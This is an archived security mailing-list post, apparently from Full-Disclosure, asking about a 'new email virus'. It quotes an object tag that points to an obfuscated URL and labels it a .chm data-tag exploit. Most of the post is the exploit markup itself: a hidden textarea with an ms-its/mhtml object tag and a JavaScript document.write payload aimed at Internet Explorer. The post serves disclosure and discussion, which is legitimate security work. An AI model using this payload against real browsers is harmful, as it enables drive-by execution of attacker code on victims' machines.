lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
From: se_cur_ity at hotmail.com (morning_wood)
Subject: new email virus?

><object  data="http://www.v%69k%6F%72d.com/default.htm"><br><br>

this is a data tag .chm exploit


[textarea id="code" style="display:none;"]
    [object
data="&#109;s-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::
/default.htm" type="text/x-scriptlet"][/object]
[/textarea]

[script language="javascript"]

document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca
tion.href.indexOf('default.htm'))));
[/script]


m.wood


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ